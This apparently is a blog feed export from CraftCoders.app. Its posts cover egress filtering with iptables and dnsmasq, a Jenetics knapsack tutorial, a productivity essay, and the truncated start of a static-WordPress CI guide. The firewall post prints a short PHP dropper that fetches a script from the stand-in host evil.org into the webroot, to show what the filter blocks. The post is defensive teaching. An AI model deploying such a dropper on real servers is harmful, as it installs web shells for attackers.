CraftCoders.app https://craftcoders.app/ Jira and Confluence apps Wed, 14 Aug 2024 13:32:07 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.3 https://craftcoders.app/wp-content/uploads/2020/02/cropped-craftcoders-blue-logo-1-32x32.png CraftCoders.app https://craftcoders.app/ 32 32 Building a simple domain name based firewall for egress filtering on Linux with iptables and dnsmasq https://craftcoders.app/building-a-simple-domain-name-based-firewall-for-egress-filtering/ Mon, 16 Aug 2021 11:45:26 +0000 https://craftcoders.app/?p=1526 This blog post shows you how you can build a simple firewall on Linux system to only allow requests to a list of whitelisted domains using dnsmasq and iptables. Using the newer nftables that replaces iptables with the iptables compatibility layer (iptables-nft) will also work.

To follow this blog post you will need to have basic knowledge of networking and *NIX systems.

Background Story

Recently we had to secure a server that runs a WordPress based application that stores tons of sensitive data. As anybody working in IT security will tell you, WordPress is a nightmare when it comes to security. Luckily only a small part of the application needed to be exposed to the internet at all, so we could hide most of the application behind an authentication proxy with two factor authentication. However the application had to still process user input that was submitted over other channels (email, json import). So there were still avenues an exploit could reach our system without first going through the authentication proxy. Also of course exploits that target the authenticated client (XSS, CSRF) are still an issue.

So we asked ourself what else we cloud do to further mitigate the risk of an infection. One of the things we discussed was an egress filter that will only let requests pass through to a set of whitelisted domains.

Why do you want to do that?

The goal of most attacks on web applications is to execute code on the web server. In the context of PHP applications this usually means executing PHP code. There are thousands of bots out there that scan the web all day long for known vulnerabilities, exploit systems and install some sort of PHP malware on them. In the PHP world most of these scripts are referred to as web shells. They allow an attacker to steal data from your system, spread SPAM or participate in DDOS attacks. The thing is these scripts are often rather large, multiple kilobytes and larger. Most exploits on the web take place over url parameters, form submissions or file uploads. Besides for the last one they usually only allow very small payloads. This is especially true if you set a short URL limit. That’s why attackers will usually use an exploit to deploy a short virus dropper that downloads the actual malware from the internet. The code of a simple non obfuscated dropper could look like this:

<?php
$virus = file_get_contents('http://evil.org/virus.php');
file_put_contents('/var/www/html/virus.php', $virus);

This would try to download an evil PHP script from http://evil.org/virus.php and try to save that to the webroot. If the dropper succeeds the attacker could then access the remote shell at http://yourdomain.tld/virus.php.

Here is where output filtering in the firewall can help you. If the firewall blocks the connection to http://evil.org the dropper will fail and even though the attacker has successfully found an exploit in your web app there will be no damage. Of course, in many cases an attacker could still modify his attack so that it is feasible without downloading anything from the internet. But at this point most bots will probably fail and humans will decide that you are not worth the effort. Security is not absolute, despite what a lot of people in IT will tell you. There is no bike lock that can’t be easily defeated in a matter of minutes, but you still lock your bike, don’t you? And when the bike standing next to it is better and has a shittier lock a thief will probably take that bike before he/she takes yours. It is all about protecting your stuff to the level, that an attack is not economically sound.

An outbound filter can also help you in a few other scenarios. It can stop spammers from trying to connect to a SMTP server and it can stop exploits that trick PHP into opening an URL instead of a file or opening the wrong URL. And it can help to protect your private data from being sent to diagnostics websites or ad servers.

Think of an outbound filter as a tool of many to fight against attacks. It should however not be your only measurement and it will not save your ass in all situations.

Whitelisting ip addresses for outbound traffic with iptables & ipset

The Linux kernel has a build in firewall. We can configure it with the iptables command. Also the kernel allows us to maintain ip sets (lists of ip addresses and networks) to match against. We can configure the ip lists with the ipsets command. On Debian we can install both tools with:

# apt-get install iptables ipset

For this guide we will assume that the interface you want to monitor outgoing traffic on is called eth0. This should be the case on most servers but your interface may be called differently. You can check with ifconfig.

Warning: It is very important that you are careful with the commands listed below. If you do it wrong you can easily lock yourself out of your server by blocking ssh.

First lets make our life simple and disable IPv6 support on our server. Because we are lazy and we really don’t want to deal with IPv6 unless we have to  😉 On Debian we can do this with sysctl.

# echo 'net.ipv6.conf.all.disable_ipv6 = 1' > /etc/sysctl.d/70-disable-ipv6.conf 
# sysctl -p -f /etc/sysctl.d/70-disable-ipv6.con

Next let’s start the actual work by creating a new ip set called whitelist:

# ipset create whitelist hash:net

First we need to make sure that we only block outgoing traffic for newly created connections and not for connections that have been established from the outside like SSH:

# iptables -o eth0 -I OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

If your server gets configured via DHCP you will also want to allow all DHCP requests:

# iptables -o eth0 -I OUTPUT -p udp --dport 67:68 --sport 67:68 -j ACCEPT

Next lets start by allowing all trafic to private ip networks. You can off course decide for yourself if you want that. In our case we are on an AWS lightsail server and a lot of the servers we need to reach like the ntp time server are in the private ip range and we want to allow them by default. We only really care about blocking access to the internet:

# iptables -o eth0 -A OUTPUT -d 10.0.0.0/8 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 172.16.0.0/12 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 192.168.0.0/16 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 169.254.0.0/16 -j ACCEPT # link local

You may also want to allow traffic to the special broadcasting and multicasting ip addresses:

# iptables -o eth0 -A OUTPUT -d 255.255.255.255 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 224.0.0.22 -j ACCEPT

You should allow requests to your dns servers. For example to allow requests to the google nameservers (8.8.8.8, 8.8.8.4) add the following:

# iptables -o eth0 -A OUTPUT -d 8.8.8.8 -p udp --dport 53 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 8.8.8.4 -p udp --dport 53 -j ACCEPT

Now we want to allow all traffic to ip addresses that are on the whitelist that we have created above:

# iptables -o eth0 -A OUTPUT -m set --match-set whitelist dst -j ACCEPT

Now you can add all the ip addresses that you want to allow requests to. For example lets add the address 194.8.197.22 (mirror.netcologne.de) to the whitelist:

# ipset add whitelist 194.8.197.22

Finally lets block all outgoing traffic. Only execute this command if you are sure you have configured all the rules properly (you can check with iptables -L). If you did it wrong you may kill your ssh connection. The blocking rule needs to be the last rule in the list of rules:

# iptables -o eth0 -A OUTPUT -j DROP

There you go, lets hope you still got access to your server. If you don’t, a reboot should fix your issues. All the settings will get wiped out after a reboot. If you did everything correctly and you execute iptables -L -n to list all the rules, the OUTPUT chain should look something like this:

# iptables -L -n
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp spts:67:68 dpts:67:68
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            state RELATED,ESTABLISHED
ACCEPT     all  --  0.0.0.0/0            10.0.0.0/8
ACCEPT     all  --  0.0.0.0/0            172.16.0.0/12
ACCEPT     all  --  0.0.0.0/0            192.168.0.0/16
ACCEPT     all  --  0.0.0.0/0            169.254.0.0/16
ACCEPT     all  --  0.0.0.0/0            255.255.255.255
ACCEPT     all  --  0.0.0.0/0            224.0.0.22
ACCEPT     udp  --  0.0.0.0/0            8.8.8.8              udp dpt:53
ACCEPT     udp  --  0.0.0.0/0            8.8.8.4              udp dpt:53
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            match-set whitelist dst
DROP       all  --  0.0.0.0/0            0.0.0.0/0

Thats it now all outgoing traffic to ips that are not on the whitelist will get blocked by the firewall. All rules will however get reset after a reboot. To make the rules permanent you need to add the commands to a startup script or make the rules persistent using iptables-persistent (on newer systems netfilter-persistent) and ipset-persistent.

DNS Filtering

There is an issue however with our simple iptables filter. It can only work with ip addresses not domain names. In the WWW we seldom know the ip addresses of web services in advance. Instead, we connect to a domain name like example.org. The domain name gets resolved to an ip address by DNS and addresses may change over time. Even worse most services these days don’t even have fixed ip addresses. Therefore an ip address filter may not be a solution to your issue. Iptables and ipsets however cannot work with domain names. You can specify a domain name during rule creating but that will instantly get resolved to an ip address.

A simple alternative to an ip-based filter is DNS filtering. The idea being you simply block DNS requests for domains you don’t want to allow requests to.

We can configure a simple dns whitelist filter with dnsmasq. Dnsmasq is a software that can provide DNS and DHCP services to a local network. We will only use it as a dns server listening on 127.0.0.1 that forwards dns requests for whitelisted domains.

You can install dnsmasq on Debian with:

# apt-get install dnsmasq

After installing dnsamsq you will need to adjust the configuration file in /etc/dnsmasq.conf. For example to only allow traffic to mirror.netcologne.de and example.org the file could look like this:

no-resolv
server=/mirror.netcologne.de/8.8.8.8
server=/mirror.netcologne.de/8.8.8.4
server=/example.org/8.8.8.8
server=/example.org/8.8.8.4

Thsi will tell dnsmasq to not resolve dns queries in general (no-resolv) and to resolve the addressses mirror.netcologne.de and example.org using the dns servers 8.8.8.8 and 8.8.8.4 (google dns). After configuring you will need to restart dnsmasq:

# systemctl restart dnsmasq

You can test your dns server with the dig command:

$ dig A www.example.org @127.0.0.1
$ dig A google.com @127.0.0.1

If you have done everything correctly the first query for www.example.org should return an ip address but the second query for google.com should fail.

To make your system use dnsmasq as dns server you will need to add it to /etc/resolv.conf:

nameserver 127.0.0.1

If you use dhcp your /etc/resolv.conf will propably get overriden after a while or on restart. To prevent that you can configure dhcp to leave the /etc/resolv.conf file alone. On debian you can do this using the following commands:

# echo 'make_resolv_conf() { :; }' > /etc/dhcp/dhclient-enter-hooks.d/leave_my_resolv_conf_alone
# chmod 755 /etc/dhcp/dhclient-enter-hooks.d/leave_my_resolv_conf_alone

Thats it you should now have a working dns whitelist filter.

Combining dns filtering and ip filtering

There is an issue however with dns filtering, it’s easy to circumvent. All one has to do to bypass it is to specify the ip address directly. And lots of malware/attackers will do just that. This is why I wanted to combine both ideas. The idea being we will use dns filtering and add the ip addresses returned by our dns server to the whitelist ipset automatically. This way we can implement a simple domain name based egress filter that will block all other traffic.

Since my whitelist is realatively small (less than 100 entries) I decided to write a simple script that will just resolve all hosts in the whitelist, add the ips to the whitelist and write the ips to a host file that is read by dnsmasq. I then trigger this script by cron job on a short interval, so that the ip addresses in the host file are always relatively fresh. That way dnsmasq will always return an ip address that has been previously whitelisted. Since dns by design expects caching, cache times of a few minutes will not pose an issue.

Once a day at night another cronjob will scrub the ip whitelist from all entries, so that outdated ips that are no longer tied to the whitelisted dns names are removed from the ip whitelist.

I’ve put my code into an easy to use shell script. It includes all the code that you will need to configure iptables, dnsmasq and the cron jobs. You can find it here: https://gist.github.com/gellweiler/af81579fc121182dd157534359790d51.

To install it download it to /usr/local/sbin/configure-firewall.sh and make it executable:

# wget -O /usr/local/sbin/configure-firewall.sh "https://gist.githubusercontent.com/gellweiler/af81579fc121182dd157534359790d51/raw/d1906381462a81cea19c7f15a9d44843ff1ba27c/configure-firewall.sh"
# chmod 700 /usr/local/sbin/configure-firewall.sh

After installing the script you can modify the variables in the top  section of the script with your favorite editor to set the domain names that you want to allow and to configure your dns servers. By default the aws debian repos and the wordpress apis are allowed.

To install all necessary packages (iptables, dnsmasq, dig) on debian you can run:

# /usr/local/sbin/configure-firewall.sh install

To disable ipv6 support on your system you can run:

# /usr/local/sbin/configure-firewall.sh disable_ipv6

To start the firewall you can execute the following command:

# /usr/local/sbin/configure-firewall.sh startup

This will configure iptables and dnsmasq. After that you can test the firewall.

To refresh the ip addresses after you made changes to the list of dns names in the top of the script or to update outdated dns results you can run:

# /usr/local/sbin/configure-firewall.sh refresh_ips

If you are happy with the result you can make the changes permanent with:

# /usr/local/sbin/configure-firewall.sh configure_cronjob

This will create 3 cronjobs: one that will run on startup, one that will refresh the ips every 10 minutes and one that will flush the ip whitelist at 4 o’clock in the morning.

Since I’m using the script on an AWS lightsail server that has no recovery console I’ve added a delay of 90 seconds to the startup cron job. That means the firewall will only get activated 90 seconds past boot. That way if I ever mess up the firewall and lock myself out of SSH I can reboot the server using the web console and I have enough time to ssh into it and kill the script. It of course also means that the firewall will not run for a short time after booting. An acceptable risk for me since I will only restart the server in very rare instances.

Conclusion

Using iptables and dnsmasq we can hack together a simple dns based whitelist-based firewall for outgoing traffic. In this basic form only the A record is queried. The A record is used for most web services. If you rely on other records (for example the MX record for mail servers) you will have to adjust the script. Adding an egress filter can add some extra security to a web server. It is however not a silver bullet that will magically protect you against all exploits. Also if you run the firewall on the web server and an attacker gains root access to your machine he/she can simply disable the firewall.

 

]]>
Solving the Knapsack Problem with the Jenetics Library https://craftcoders.app/solving-the-knapsack-problem-with-the-jenetics-library/ Thu, 13 May 2021 10:46:48 +0000 https://craftcoders.app/?p=1458 Read More]]> According to its official documents, Jenetics is a library that is used for programming evolutionary algorithms written in Java. Jenetics is implemented using the Java Stream interface, so it works smoothly with the rest of the Java Stream API. Evolutionary algorithms have their roots in biology, as they use mechanisms inspired by biological evolution, such as reproduction, mutation, recombination, and selection. If you want to learn more about the theory behind evolutionary algorithms, I’d suggest reading Introduction to Evolutionary Algorithms first.

Disclaimer: This blog post is based on Introduction to Jenetics Library from Baeldung. But it is using the current library version (6.2.0) and a more complex example: The knapsack problem without using the libraries provided classes for the problem.

The knapsack problem

Given a set of items, each with a weight and a value, determine the number of each item to include in a collection so that the total weight is less than or equal to a given limit and the total value is as large as possible. It derives its name from the problem faced by someone who is constrained by a fixed-size knapsack and must fill it with the most valuable items.

Wikipedia

Defining the problem in code

In the following example, we have a class called “Knapsack” that represents our problem. The class defines items that consist of a size and a value (possibleKnapsackItems). These items are initialized with random values between 0 and 10 and put in a list to represent the items we can put into our knapsack. Furthermore, the class defines the maximum size the knapsack can hold. Attention: Don’t mix up the size of the knapsack (Knapsack.getKnapsackSize) with the number of items that we could put in the knapsack (Knapsack.getItemCount). The items that we actually put into the knapsack will be defined later in our evolutionary algorithm.

public final class Knapsack {
    private final List<Item> possibleKnapsackItems; // items that *might* end up in the knapsack, depending on chromosome
    private int knapsackSize;

    public Knapsack(List<Item> possibleItems, int knapsackSize) {
        this.possibleKnapsackItems = possibleItems;
        this.knapsackSize = knapsackSize;
    }

    public static Knapsack initializeWithRandomItems(int size, int knapsackSize) {
        Random random = new Random(123);
        List<Item> items = Stream.generate(() -> 
                new Item((int) (random.nextDouble()*10),(int) (random.nextDouble()*10)))
                .limit(size)
                .collect(Collectors.toList());
        return new Knapsack(items, knapsackSize);
    }

    public Item getItemByIndex(int index) { return this.possibleKnapsackItems.get(index); }
    public int getItemCount() { return this.possibleKnapsackItems.size(); }
    public int getKnapsackSize() { return this.knapsackSize; }

    public static final class Item {
        private final int size;
        private final int value;

        public Item(final int size, final int value) {
            this.size = Requires.nonNegative(size);
            this.value = Requires.nonNegative(value);
        }

        public int getSize() { return size; }
        public int getValue() { return value; }
    }
}

Let’s get started with the Jenetics Library

In order to use Jenetics, we need to add the following dependency into our build.gradle:

implementation 'io.jenetics:jenetics:6.2.0'

Next we create a runnable class App that will use the Jenetics library and our Knapsack class to run a genetic algorithm. First, let’s make use of our previously created class: We create a knapsack with a size of 100 and 80 items from which we can pick.

public class App {
    private final static int ITEM_COUNT = 80;
    private final static int KNAPSACK_SIZE = 100;
    private final static int POPULATION_SIZE = 500;

    private final Knapsack knapsack = Knapsack.initializeWithRandomItems(ITEM_COUNT, KNAPSACK_SIZE);

    public static void main(String[] args) {
        new App().run(POPULATION_SIZE);
    }

    public void run(int populationSize) {
        // TODO Run the genetic algorithm
    }
}

Let’s work on the run() function. We need to convert the Knapsack problem into another representation that a genetic algorithm can work with, namely a chromosome. And indeed we can transform it into a so-called binary problem, where each one represents an item we put into the knapsack, each zero represents an item we don’t put in the knapsack.

Using the Jenetics library we can create a BitChromosome with a length of 80 which is equal to the number of items we can choose from (ITEM_COUNT) and a probability of having 1’s in the chromosome equal to 0.3. These BitChromosomes are accessible via a factory, meaning we can generate as many randomly initialized chromosomes as we want our population size to be.

final Factory<Genotype<BitGene>> gtf =
        Genotype.of(BitChromosome.of(this.knapsack.getItemCount(), 0.3));

Now, let’s create the execution environment:

final Engine<BitGene, Integer> engine = Engine
        .builder(this::fitness, gtf)
        .populationSize(populationSize)
        .build();

The Engine will run our genetic algorithm and needs a couple of information:

  1. The factory we just created, that produces our random chromosomes
  2. The number of random chromosomes we want to create and compare (called populationSize)
  3. Last but not least, a fitness function which we didn’t define, yet

The Fitness Function

The fitness function calculates the fitness of each chromosome. In the case of the knapsack problem, the fitness is equal to the sum of the values of the individual elements that we place in our knapsack (i.e. items with corresponding one in the chromosome). How to put that into code, is something you can think about now 😉

private Integer fitness(Genotype<BitGene> gt) {
    BitChromosome chromosome = gt.chromosome().as(BitChromosome.class);
    int fitness = 0;
    // TODO: Calculate fitness
    return fitness;
}

A first run

In the final step, in our run function, we add some basic statistics, start the evolution and collect the results:

final EvolutionStatistics<Integer, ?> statistics = EvolutionStatistics.ofNumber();
final Phenotype<BitGene, Integer> best = engine.stream()
        // Truncate the evolution stream after 7 "steady"
        // generations.
        .limit(bySteadyFitness(10))
        // Update the evaluation statistics after
        // each generation
        .peek(statistics)
        // Collect (reduce) the evolution stream to
        // its best phenotype.
        .collect(toBestPhenotype());

System.out.println(statistics);
System.out.println(best);

If you put everything together and implemented the fitness function correctly, you should end up with a result looking like this:

+---------------------------------------------------------------------------+
 |  Time statistics                                                          |
 +---------------------------------------------------------------------------+
 |             Selection: sum=0,029213700000 s; mean=0,000811491667 s        |
 |              Altering: sum=0,120244900000 s; mean=0,003340136111 s        |
 |   Fitness calculation: sum=0,054355500000 s; mean=0,001509875000 s        |
 |     Overall execution: sum=0,199033900000 s; mean=0,005528719444 s        |
 +---------------------------------------------------------------------------+
 |  Evolution statistics                                                     |
 +---------------------------------------------------------------------------+
 |           Generations: 36                                                 |
 |               Altered: sum=133.010; mean=3694,722222222                   |
 |                Killed: sum=0; mean=0,000000000                            |
 |              Invalids: sum=0; mean=0,000000000                            |
 +---------------------------------------------------------------------------+
 |  Population statistics                                                    |
 +---------------------------------------------------------------------------+
 |                   Age: max=14; mean=2,183056; var=7,349621                |
 |               Fitness:                                                    |
 |                      min  = 0,000000000000                                |
 |                      max  = 188,000000000000                              |
 |                      mean = 134,464166666667                              |
 |                      var  = 4503,017550280571                             |
 |                      std  = 67,104527047589                               |
 +---------------------------------------------------------------------------+
 [11101010|00000100|11000101|10001000|10001111|10100000|01010010|10110000|11000101|10000101] -> 188

If so, congratulations! You made it.

Further Optimiziation

So up until now, we told the engine to learn using 500 generations and let it decide on itself how to do mutation, recombination, and selection. Of course, if you want to improve the quality of your best phenotype you can configure these things yourself. An easy thing to do is to increase the number of generations to i.e. 5000 and your results will probably improve. But you can also tweak several things like mutation yourself:

final Engine<BitGene, Integer> engine = Engine
        .builder(this::fitness, gtf)
        .populationSize(populationSize)
        .survivorsSelector(new TournamentSelector<>(5))                    
        .offspringSelector(new RouletteWheelSelector<>())                   
        .alterers(
            new Mutator<>(0.115),
            new SinglePointCrossover<>(0.16))
        .build();

But to gain some real improvements using your own configuration is something that is pretty time consuming and would need another blogpost, so I’ll leave that to you 😀

Greetings,

Domi

]]>
Time Management: Doing Less lets you Achieve More https://craftcoders.app/time-management-doing-less-lets-you-achieve-more/ Mon, 14 Sep 2020 08:00:00 +0000 https://craftcoders.app/?p=1378 “There is surely nothing quite so useless as doing with great efficiency what should not be done at all.” – Peter F. Drucker [1]

Effectiveness and Efficiency

Do you know the difference between effectiveness and efficiency? Effectiveness is the relationship between a goal achieved and a goal set, whereas efficiency is the ratio of the achieved goal to the effort. Thus effectiveness is a measure of usefulness and efficiency is one of economy. This is where it gets interesting because the result of efficient working does not have to be following my set goals (or those of my company) and therefore effective at the same time. Moreover, it often happens that we do bullshit efficiently. Checking e-mail 30 times a day to develop an elaborate system of rules and sophisticated techniques to ensure that 30 of these brain farts are processed as quickly as possible is efficient but far from being effective [2]. We often assume that when people are busy, they work on important tasks, implying effectiveness. Unfortunately, this is often not true.

But why does this happen? Two quite clear situations cause this behavior in my opinion. The first and very rare situation is that there is nothing important to do. Now that we have to ask ourselves what to do next we decide more or less obviously, depending on whether I am at work or not, to do tasks/things that are not very effective. Taking a break or doing nothing is usually not an option because we hate not using time and are afraid of social disregard (e.g. by colleagues). Someone who takes a break while other work is called lazy faster then he*she likes, even if it is not guaranteed that the others work effectively. That’s why we prefer to do bullshit instead of a targeted break, at least at work. But as already mentioned this situation is quite rare in my opinion, because many people are looking for new challenges if there is nothing important to do. The second situation is that there are a few critical tasks to get closer to my (or the company) goals. Being busy is then used as an excuse to avoid these most unpleasant tasks. Effective work fails not because of the amount or complexity of tasks, but by distraction or working on unimportant things. There are thousands of useless things you can do (efficiently): Sort Outlook contacts, cleaning up the filing cabinet, write an unimportant report, and so on. Whereas it is difficult, for example, to call the Head of Department to say that something cannot be done as planned and that a new meeting with the customer is needed.

These considerations lead me to the following conclusion: It is much more important what you do than how you do it. Don’t get me wrong, efficiency is something very important. But you should consider it secondary in comparison to effectiveness. So now let’s have a look at the Pareto Law as it is a rule which helps us to identify important/critical tasks. 

Pareto’s 80/20 Law

Pareto is a rather well-known and controversial Economist. He became known mainly through the rule named after him: Pareto’s Law. This rule is explained quite simply: 80% of a result comes from 20% of the effort [3]. Depending on the context, you can find different variations of this, like

  • 80% of the consequences come from 20% of the causes,
  • 80% of the revenue comes from 20% of the products (and/or customers),
  • 80% of costs come from 20% of the purchases,

and so on. The exact ratio varies and you find examples from 70/30 to 99/1. Significant is the large gradient. Even though most people realize that this rule can’t apply to everything and is therefore discussed with good reason, Pareto makes a point here. Just from those already mentioned circumstances above, and a few more, we often tend to work ineffective. This creates an imbalance between effort and usefulness results. With this, the Pareto Rule pushes us to identify self-reflectively where we waste time and to find out what is important for our goals. So here you can try to answer the following questions for yourself:

  • What 20% causes 80% of my problems?
  • What 20% causes 80% of my useful outcomes?

or in a personal way:

  • What 20% causes 80% of my unhappiness?
  • Which 20% causes 80% of what makes me happy?

These questions can be used to identify critical tasks or circumstances and thus allow us to decide what we should do. Or as in most cases what we should let be, e.g. caring for a lot of customers which only generates a fraction of the revenue. Another simple question that helps us identify what we should do is the following: If you were only allowed to work two hours a day, what tasks would you do and what tasks would you avoid at all costs? This simple question helps to identify the critical tasks and leads us to the final topic: How to get shit done in time.

Parkinson’s Law

Time is wasted because there is so much of it [4]. As an employee, you are usually not free to choose how long you want to work each day. Most people have to work between 8-12 hours. While the time of work plays a role in physical labor, it behaves for most creative, constructive, and conceptual jobs like a servitude. As you are obliged to be in the office you choose to create activities to fill the time. Being at work for 8 hours does not mean that you are creative for 8 hours or being able to be creative that long. Also, don’t get me wrong on this, there are days when you can work very effectively for a long time, but often in the context of deadlines. And that’s what the Parkinson’s Law is about:

“Work expands so as to fill the time available for its completion” – C. Northcote Parkinson [5]

Or in other words: A task expands to the exact degree that time is available to complete it, not to the degree that it is actually complex [6]. If you had a day to deliver a project, the time pressure would force you to concentrate on your work and do only the most essential things possible. If you had 2 weeks for the same task, it would take you two weeks and you will probably have wasted much more time on unimportant subtasks. This does not mean that we can do everything if we set the deadline short enough, but that we work much more effectively if we set ourselves tight deadlines. 

Try it out

To sum it up in one sentence: Doing less lets you achieve more! With Pareto, you can identify your few critical tasks for your goals. And according to Parkinson’s Law, you should shorten the work time so that you stick to these critical tasks and do not inflate the goals unnecessarily. Try it out! Choose a personal goal or your current company task. Ask your self which the really important (sub-)tasks are (80/20 helps). Afterward, shorten your time to work on these tasks to a limit (e.g. 2 hours a day) and set you a tight deadline to deliver. For the deadline, it is important that you feel uncomfortable or it seems impossible. The goal is not to have everything done by tomorrow in magical ways, but to increase the focus. Look after the deadline and see what you have achieved. Probably much more in less time. 

One last note: In my opinion, these rules do not serve to maximize the time gained for other work, but to free it up. We should try to create the important in little time and use the remaining time for our interests and private life to have a healthy balance. The goal is not having 4 slots of 2-hour pure effectiveness but having one or two and not wasting the rest of the (work) time. 

Key Takeaways

  • Being busy is not equal to being effective. 
  • Being efficient does not imply being effective.
  • We use busyness to postpone critical and unpleasant tasks.
  • We use busyness to avoid apparent “time-loss” and social disregard.
  • It is much more important what you do than how you do it.
  • Pareto gives you the possibility to identify what you should do.
  • Parkinson’s Law lets you stay focussed on the important things.
  • Doing less let you achieve more.

Sources

[1] Peter Ferdinand Drucker: Managing for Business Effectiveness. Harvard Business Review. 3, May/June, 1963, P. 53–60 (hbr.org opened 04/09/2020).

[2] Timothy Ferris, 4 Hour Work Week, Page 69

[3] Bunkley, Nick (March 3, 2008). “Joseph Juran, 103, Pioneer in Quality Control, Dies”The New York Times. (opened 04/09/2020)

[4] Timothy Ferris, 4 Hour Work Week, Page 75

[5] C. Northcote Parkinson, Parkinson’s Law, The Economist. 177, No. 5856, 19. November 1955, P. 635–637.

[6] M. Mohrmann: Bauvorhaben mithilfe von Lean Projektmanagement neu denken. 4. Auflage. BoD, 2011, ISBN 978-3-8391-4949-2, P. 55.

]]>
WordPress without the security hassles – using GitLab CI/CD to automate transforming WordPress into a static website https://craftcoders.app/wordpress-vs-static-web-pages-the-best-of-both-worlds/ Sun, 29 Mar 2020 18:02:07 +0000 https://craftcoders.app/?p=1161 Read More]]> Recently we launched our new company website (craftcoders.app). It’s a simple website that showcases us and our work and describes the kind of services that we provide to customers. It requires no dynamic features except for the contact form.

We decided to build our website with WordPress, but to automatically generate a static copy of it and serve that to visitors. We’re using Gitlab CI/CD as automation tool. This guide will explain how you can setup your own pipeline to generate a static website from a WordPress site on a regular schedule or manually. But first we’ll have a detailed look at the pros and cons of WordPress and static websites in the next section. Feel free to skip over it, if this is not of interest to you.

The ups and downs of WordPress and static websites

At craft-coders we value efficiency, and we try to choose the right tool for the job. WordPress is the leading CMS for small websites. It’s easy to set up and deploy. At the time of writing ~35% of all websites on the internet are built with it. Because of its popularity there are tons of useful plugins and great themes available. So that you can build good-looking and feature rich websites really quickly.

But WordPress has its downsides. Mainly it sucks at security. So famously, that ~1/5 of the Wikipedia article on it focuses on its vulnerabilities. The plugin market for WordPress does not provide any quality checks and if you look at the code base of most plugins (even some popular ones), any self-respecting programmer will scream out in agony.

Because of this we are very much against using WordPress for more than simple representational websites and blogs. Basically if your website is built on WordPress you must expect getting hacked. It’s therefore crucial that your WordPress installation is running on a server that isn’t storing any sensitive information about you or your customers and that you use passwords that are used nowhere else. If people really need to log into your website, then at best you use an external authentication service, so that no information about passwords is stored on your server.

Still, even if there is nothing of value to gain for a potential attacker, so that a targeted attack against your website is very unlikely and getting hacked is more a nuisance than an actual problem, you still need to take basic precautions. Due to the popularity of WordPress there are a lot of bots out there that just scan the web for known vulnerabilities. They try to hack as many web pages as possible and use them to spread SPAM emails, viruses and propaganda, or use your server to mine Bitcoins.

The most important thing that you must do to protect yourself from bots is to keep your WordPress installation and its plugins updated at all times. This can be very annoying because updates may break things. And for most small websites the goal is often to deploy and forget. You don’t want to spend time fostering your site, but just want it to continue to function as expected and be done with it. The ultimate goal of every person in operations is, to go unnoticed. If you have an admin that is constantly running around fixing stuff he/she is probably not doing a good job, or he/she has to compensate for the mistakes of the developers. You want things to work without the need of thinking about it.

Even though WordPress is the nightmare of every admin, in contrast to that, static web pages are the dream of every person working in operations. They’re super easy to deploy, work super fast, can be kept in RAM and requests can be distributed between as many servers as you like. Because there is no code running on the server involved, they are basically unhackable. Provided of course that your webserver is secure, but since you can just rent a managed server this isn’t really an issue that you need to concern yourself with. Yes, attacks running in the clients browser exploiting flaws in JavaScript or CSS are still feasible, but since a truly static website by definition has no valuable cookies or private information to steal, there is little to be gained by performing an attack in this manner (talking to authenticated REST-Service can change that picture of course).

There are a few good static site generators out there, but as of now no one of them provides an easy-to-use GUI and as many plugins/themes as WordPress. If your goal is to build a simple website fast, WordPress should still be your first choice. Also if you decide to go with a static site generator there is no going back, your site will forever be static. Of course, you’re always free to use JavaScript to talk to REST-services and that is a good design choice, so this sounds more dramatic than it actually is.

To sum it up WordPress is great for editors and site-builders but it sucks in operations. In contrast, static web pages are hard to use by editors and usually require more development effort than WordPress, but they are great in operations. This is a classic development vs. operations issue.

Using WordPress to generate a static web page

What if you could have both? Why not have a private non-accessible installation of WordPress and from that generate a static copy. Then you can deploy that copy to a public accessible web space. That way you have the best of both worlds. Of course you deprive yourself of the dynamic features of WordPress, so no comment fields and no login sections, but if you don’t need any of that, this is a perfect solution for you. And if your requirements ever change you can always replace your static copy with the real thing and go on with it.

This is the basic idea. The first thing we tried out was the WP2Static plugin which aims at solving this issue, but we couldn’t get it running. We then decided to build our own solution using our favorite automation tool GitLab CI/CD. We used gitlab.com, and at the moment they are offering 2000 free ci minutes to every customer, which is a really sweet deal. But any ci-tool should do. You should not have many issues porting this guide to Jenkins or any other tool that allows to execute bash scripts. Also, we’re assuming you are using Apache (with mod_rewrite) as web server and that you can use .htaccess files. But porting this concept to other web servers shouldn’t be too difficult.

You can find and fork the complete sample code here: https://gitlab.com/sgellweiler/demo-wordpress-static-copy.

Here is the plan in detail. We’re going to use the same domain and web space to host both the private WordPress installation and the public accessible static copy. We’re going to install WordPress to a sub directory, that we will protect with basic auth using a .htaccess file. This is the directory that all your editors, admins and developers will access. The Gitlab job will crawl this installation using Wget and deploy the static copy via ssh+rsync into the directory /static on the web space. Then will use the .htaccess file in the root directory to rewrite all requests to the root path into the static directory. You can configure the gitlab job to run every day, hour or only manually depending on your needs.

To follow this guide you should have access to a *NIX shell and have the basic Apache tools (htpasswd), ssh tools (ssh-keygen, ssh-keyscan), find, sed and GNU Wget installed. Some distros ship with a minimal Wget installed, so make sure that you have the feature rich version of Wget installed (wget –version).

Setting up the web space

First install WordPress into a sub directory. For this guide I’m going with wp_2789218. You can go along with this name or choose your own, you should use a unique name tough, a string that you will use nowhere else. Best you add a few random generated chars in there. We’re not doing this for security but to make search+replace for urls easier in the next step. If you go with your own folder name remember to replace all occurrences of wp_2789218 in this guide with your folder name. We’ll also add a catchy alias /wp, for you and your coworkers to remember, so don’t worry too much about the cryptic name.

Next we create a directory to store our static copy. We’ll just name that static/ and for now we’ll just add an index.html with <h1>Hello World</h1> in there.

Let’s configure Apache to password protect our WordPress installation and to redirect request to /static. First generate a .htpasswd file with user+password at the root-level (or at another place) of your web space using:

htpasswd -c /home/pwww/.htpasswd yourusername

Next create a .htaccess on the root level with the following. You need to reference the .htpasswd file with an absolute path in the AuthUserFile:

RewriteEngine On
RewriteBase /

# Setup basic auth
AuthUserFile /var/www/httpdocs/.htpasswd
